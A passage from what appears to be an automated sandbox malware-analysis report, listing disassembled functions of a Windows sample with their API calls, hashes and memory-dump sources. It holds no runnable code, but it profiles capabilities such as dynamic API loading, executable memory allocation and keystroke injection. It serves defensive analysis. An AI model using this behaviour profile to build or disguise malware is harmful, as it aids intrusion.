              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00184DB4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
              • API String ID: 2574300362-1355242751
              • Opcode ID: 452c7b22314af0377b8686b32570c584de4cf246817d78cd5785ba6798685251
              • Instruction ID: 803604ffaec0440337e5434068c68f3ea09d551348b075376918f54f9fb689d0
              • Opcode Fuzzy Hash: 452c7b22314af0377b8686b32570c584de4cf246817d78cd5785ba6798685251
              • Instruction Fuzzy Hash: 21D012715A0713CFD7309F71D908646B6D4AF19355B118839D8C5D6550DB70D480CB50
              Function 00201072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
              Download Yara Rule
              APIs
              • LoadLibraryA.KERNEL32(advapi32.dll,?,002012C1), ref: 00201080
              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00201092
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: RegDeleteKeyExW$advapi32.dll
              • API String ID: 2574300362-4033151799
              • Opcode ID: b24a07f97130081d106846d87064114e5353ef761063a2e0347a8c3d96af6804
              • Instruction ID: be00a5461f64a809edce33e29ae61d499ba6c21cf61de3ee67359d419daf3f17
              • Opcode Fuzzy Hash: b24a07f97130081d106846d87064114e5353ef761063a2e0347a8c3d96af6804
              • Instruction Fuzzy Hash: B6D01770960713CFD7309F35E918A1BB6E5AF1A361F118D3AACCADA591E770C8E0CA50
              Function 001F93F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
              Download Yara Rule
              APIs
              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,001F9009,?,0020F910), ref: 001F9403
              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 001F9415
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: GetModuleHandleExW$kernel32.dll
              • API String ID: 2574300362-199464113
              • Opcode ID: 9c351044e67f083896d9a6906ece69f444b9283a4fdeca19029eec2d1265b38b
              • Instruction ID: 11e7d8fe64d50e5ea51f14decf1c73ba8e7b95df366be6455fee591eb927a3c3
              • Opcode Fuzzy Hash: 9c351044e67f083896d9a6906ece69f444b9283a4fdeca19029eec2d1265b38b
              • Instruction Fuzzy Hash: B5D01274654717CFD7319F31DB0C616B6D5BF15351B11C83A9585D6951D770C4C0CA50
              Function 001C1B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: LocalTime__swprintf
              • String ID: %.3d$WIN_XPe
              • API String ID: 2070861257-2409531811
              • Opcode ID: 0a6e8a7b32e529432b4831225431f7fd782f69730d38d753fa476b3593628d42
              • Instruction ID: 599c77f4adc69f522525db3d16b6d9b266e5955e712bb4338a54ba89fd2c7948
              • Opcode Fuzzy Hash: 0a6e8a7b32e529432b4831225431f7fd782f69730d38d753fa476b3593628d42
              • Instruction Fuzzy Hash: 7BD012B5884118FACB5CAA909D45FF9737CA726701F110596B90291401F334DF949F21
              Function 001D76C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f3c3c418aa46916e2717be1ebba884a6dd1c3cb08bb2bb6cd6f756c8fdc51239
              • Instruction ID: 43e9eea6a87790f4d62a2e4bef1dab9fee62544079ad1d6cada5ef4317205d11
              • Opcode Fuzzy Hash: f3c3c418aa46916e2717be1ebba884a6dd1c3cb08bb2bb6cd6f756c8fdc51239
              • Instruction Fuzzy Hash: AAC19075A04216EFCB14CF94C898EAEB7B5FF48314B15859AE805EB391E730DD81CB90
              Function 001FE33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
              Download Yara Rule
              APIs
              • CharLowerBuffW.USER32(?,?), ref: 001FE3D2
              • CharLowerBuffW.USER32(?,?), ref: 001FE415
                • Part of subcall function 001FDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 001FDAD9
              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 001FE615
              • _memmove.LIBCMT ref: 001FE628
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: BuffCharLower$AllocVirtual_memmove
              • String ID:
              • API String ID: 3659485706-0
              • Opcode ID: 1e9e32abcab154ec24287bfd88720fd05ef3031d5575116bcad2b82c31e345fb
              • Instruction ID: 3d901bf43e80dfff4e9e57bc7b5e6fccb3113f35a27f60e2945ad8c4cebc4b5f
              • Opcode Fuzzy Hash: 1e9e32abcab154ec24287bfd88720fd05ef3031d5575116bcad2b82c31e345fb
              • Instruction Fuzzy Hash: 82C157756083058FC714DF28C48096ABBE4FF99718F14896EF9999B361D730EA46CF82
              Function 001F83A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
              Download Yara Rule
              APIs
              • CoInitialize.OLE32(00000000), ref: 001F83D8
              • CoUninitialize.OLE32 ref: 001F83E3
                • Part of subcall function 001DDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 001DDAC5
              • VariantInit.OLEAUT32(?), ref: 001F83EE
              • VariantClear.OLEAUT32(?), ref: 001F86BF
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
              • String ID:
              • API String ID: 780911581-0
              • Opcode ID: 038274687edc275a6ea577332314bb1e12c4bce23ff699cc1df6c7177dba7cbe
              • Instruction ID: 4748fd738532ff91ebfed5496a4dc7c34fa8b63841b40518e44c094b779191c6
              • Opcode Fuzzy Hash: 038274687edc275a6ea577332314bb1e12c4bce23ff699cc1df6c7177dba7cbe
              • Instruction Fuzzy Hash: 99A14B756047059FDB14EF14C885B2AB7E4BF98324F18444DFA9A9B3A2CB30ED05CB42
              Function 001D6DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Variant$AllocClearCopyInitString
              • String ID:
              • API String ID: 2808897238-0
              • Opcode ID: 40f93289a5f900837ef6825c1aadea9c4c32f4b1008d63d2fb568396b355e25f
              • Instruction ID: 7f7f38018963a0836a4391d280975bd6140494c05f6cdb1da6c1309e096952d5
              • Opcode Fuzzy Hash: 40f93289a5f900837ef6825c1aadea9c4c32f4b1008d63d2fb568396b355e25f
              • Instruction Fuzzy Hash: D051D8346087019FDB34AF69E895A3EB3E5AF59310F24881FF996CB3D1EB7098409B51
              Function 00209A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
              Download Yara Rule
              APIs
              • GetWindowRect.USER32(0142FB10,?), ref: 00209AD2
              • ScreenToClient.USER32(00000002,00000002), ref: 00209B05
              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00209B72
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$ClientMoveRectScreen
              • String ID:
              • API String ID: 3880355969-0
              • Opcode ID: 516f41c5aa7b148611e952c62e2947a02ba48913261231e036234a300ba98309
              • Instruction ID: 0d0d872d4f3cd353b98c4a880fa1a5409f691a57575d1d3682d526b67992b248
              • Opcode Fuzzy Hash: 516f41c5aa7b148611e952c62e2947a02ba48913261231e036234a300ba98309
              • Instruction Fuzzy Hash: 66513F34A10309EFCF20DF58E9849AE7BB9FB55324F148159F8169B2D2D730AD91CB50
              Function 001F6CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
              Download Yara Rule
              APIs
              • socket.WSOCK32(00000002,00000002,00000011), ref: 001F6CE4
              • WSAGetLastError.WSOCK32(00000000), ref: 001F6CF4
                • Part of subcall function 00189997: __itow.LIBCMT ref: 001899C2
                • Part of subcall function 00189997: __swprintf.LIBCMT ref: 00189A0C
              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 001F6D58
              • WSAGetLastError.WSOCK32(00000000), ref: 001F6D64
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ErrorLast$__itow__swprintfsocket
              • String ID:
              • API String ID: 2214342067-0
              • Opcode ID: 68a4195c67bcd0fde04a2d0565e40f9848611967adfde6a99be57007f3e09124
              • Instruction ID: 764cd70cd2b1317f4a948a3ec8c505b1be26c22feb208fdfc0fe0ffe9256f8f1
              • Opcode Fuzzy Hash: 68a4195c67bcd0fde04a2d0565e40f9848611967adfde6a99be57007f3e09124
              • Instruction Fuzzy Hash: C941B075740200AFEB20BF64DC86F3A77E5AB14B14F488058FA599B2D3DB719E008B91
              Function 001F672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON
              Download Yara Rule
              APIs
              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0020F910), ref: 001F67BA
              • _strlen.LIBCMT ref: 001F67EC
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _strlen
              • String ID:
              • API String ID: 4218353326-0
              • Opcode ID: 577375d70d73e9525263fc947ffbe666cfdd266b1cbdc73f1a338cbe923e9b97
              • Instruction ID: b3945854ffc47f6c3d561d70643832d0f977169310b37b63c3a0e63a2fa7a275
              • Opcode Fuzzy Hash: 577375d70d73e9525263fc947ffbe666cfdd266b1cbdc73f1a338cbe923e9b97
              • Instruction Fuzzy Hash: 1641C775A00208AFCB14FB64DCD5FBEB3A9EF58354F148169F91597292DB30AE00CB50
              Function 001EBA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
              Download Yara Rule
              APIs
              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 001EBB09
              • GetLastError.KERNEL32(?,00000000), ref: 001EBB2F
              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 001EBB54
              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 001EBB80
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CreateHardLink$DeleteErrorFileLast
              • String ID:
              • API String ID: 3321077145-0
              • Opcode ID: 06e12899a892cad666f61f6ec98f86002dc04e3fbaee4a528ba701444a379d9d
              • Instruction ID: 796667d65ab87d689bfb2bbd2dece9400aa27d427738c0c3a8003a41bb84ffbb
              • Opcode Fuzzy Hash: 06e12899a892cad666f61f6ec98f86002dc04e3fbaee4a528ba701444a379d9d
              • Instruction Fuzzy Hash: D6412939600A51DFCB20EF15C584A6DBBE1EF99314B198498EC4A9B762CB34FD01CF91
              Function 00208AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
              Download Yara Rule
              APIs
              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00208B4D
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: InvalidateRect
              • String ID:
              • API String ID: 634782764-0
              • Opcode ID: 6c9c4cd68bc801621c4dbca09f2fdb93ebdbab0ed18449d0f49595be4b18bd56
              • Instruction ID: 7eafe9ad47963b3eda4fde17874da7825960ec6a2afafa67898a62887661d8b5
              • Opcode Fuzzy Hash: 6c9c4cd68bc801621c4dbca09f2fdb93ebdbab0ed18449d0f49595be4b18bd56
              • Instruction Fuzzy Hash: 6631D474660305BFEB309E18DC49FAB3BA4EB06318F644512FAD1D66E3DF70A9608B51
              Function 0020ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
              Download Yara Rule
              APIs
              • ClientToScreen.USER32(?,?), ref: 0020AE1A
              • GetWindowRect.USER32(?,?), ref: 0020AE90
              • PtInRect.USER32(?,?,0020C304), ref: 0020AEA0
              • MessageBeep.USER32(00000000), ref: 0020AF11
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Rect$BeepClientMessageScreenWindow
              • String ID:
              • API String ID: 1352109105-0
              • Opcode ID: 51a3c35a0cecc8635eaf3d65b58c95c04ee0476f37dd009a78fc39424f8aa03e
              • Instruction ID: 2e57d803eb9b59339a616e2ed58e6aa3b4a59fb66cbebd6fb072f2765cbcb29e
              • Opcode Fuzzy Hash: 51a3c35a0cecc8635eaf3d65b58c95c04ee0476f37dd009a78fc39424f8aa03e
              • Instruction Fuzzy Hash: A3418E7461031ADFCB11CF58D888BA97BF5FB4A340FA881B9E8149B292D731A851CF52
              Function 001E0FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
              Download Yara Rule
              APIs
              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 001E1037
              • SetKeyboardState.USER32(00000080,?,00000001), ref: 001E1053
              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 001E10B9
              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 001E110B
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: KeyboardState$InputMessagePostSend
              • String ID:
              • API String ID: 432972143-0
              • Opcode ID: eb8570ad13c223e62b4f9dd535aca406a9ab7dd7c5151604df372d5572302d38
              • Instruction ID: f271c17d2e3b2b1dfac02ddc3bd26b65f9e9c229bdce403e1857d06671b3364b
              • Opcode Fuzzy Hash: eb8570ad13c223e62b4f9dd535aca406a9ab7dd7c5151604df372d5572302d38
              • Instruction Fuzzy Hash: 8B313530E44EC8BEFB358B678C09BFEBBA9AB49320F08431AF591521D1C37589C49751
              Function 001E1121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
              Download Yara Rule
              APIs
              • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 001E1176
              • SetKeyboardState.USER32(00000080,?,00008000), ref: 001E1192
              • PostMessageW.USER32(00000000,00000101,00000000), ref: 001E11F1
              • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 001E1243
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: KeyboardState$InputMessagePostSend
              • String ID:
              • API String ID: 432972143-0
              • Opcode ID: 51b17713a02969e0f3ca1bb08c1b65a679c83086ba65c33f9b23ab4f4430a558
              • Instruction ID: 4742e4baf43658e0d24e2b4644f231e3bf0f1208b1f626b4ce81ba87773e127b
              • Opcode Fuzzy Hash: 51b17713a02969e0f3ca1bb08c1b65a679c83086ba65c33f9b23ab4f4430a558
              • Instruction Fuzzy Hash: 96312830A40B887AEF358B778C087FE7BBAAB59310F14431AF691925D1C37489959751
              Function 001B6415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001B644B
              • __isleadbyte_l.LIBCMT ref: 001B6479
              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001B64A7
              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001B64DD
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
              • String ID:
              • API String ID: 3058430110-0
              • Opcode ID: 60d11c0a9a9c4034f303d70982ccd6a79476e0afaa86c26833a6cb9eb6858d61
              • Instruction ID: 60cde71a97867e160fae45ca524db758c53e8e78d967df51ea5afb5ba02240a4
              • Opcode Fuzzy Hash: 60d11c0a9a9c4034f303d70982ccd6a79476e0afaa86c26833a6cb9eb6858d61
              • Instruction Fuzzy Hash: 0131EF31600646EFDB258F64CC88BFA7BA5FF61310F154429F868871A1EB39D850DB90
              Function 00205175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
              Download Yara Rule
              APIs
              • GetForegroundWindow.USER32 ref: 00205189
                • Part of subcall function 001E387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001E3897
                • Part of subcall function 001E387D: GetCurrentThreadId.KERNEL32 ref: 001E389E
                • Part of subcall function 001E387D: AttachThreadInput.USER32(00000000,?,001E52A7), ref: 001E38A5
              • GetCaretPos.USER32(?), ref: 0020519A
              • ClientToScreen.USER32(00000000,?), ref: 002051D5
              • GetForegroundWindow.USER32 ref: 002051DB
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
              • String ID:
              • API String ID: 2759813231-0
              • Opcode ID: 44d86ab2a6b6e17e3e632e91394aefa39f64b9781be4a604c7c7e8b9a1348136
              • Instruction ID: 9c610b7d81efa23dfc4905369350362ac1b3b2b4912b8f55be5947e039ee5d81
              • Opcode Fuzzy Hash: 44d86ab2a6b6e17e3e632e91394aefa39f64b9781be4a604c7c7e8b9a1348136
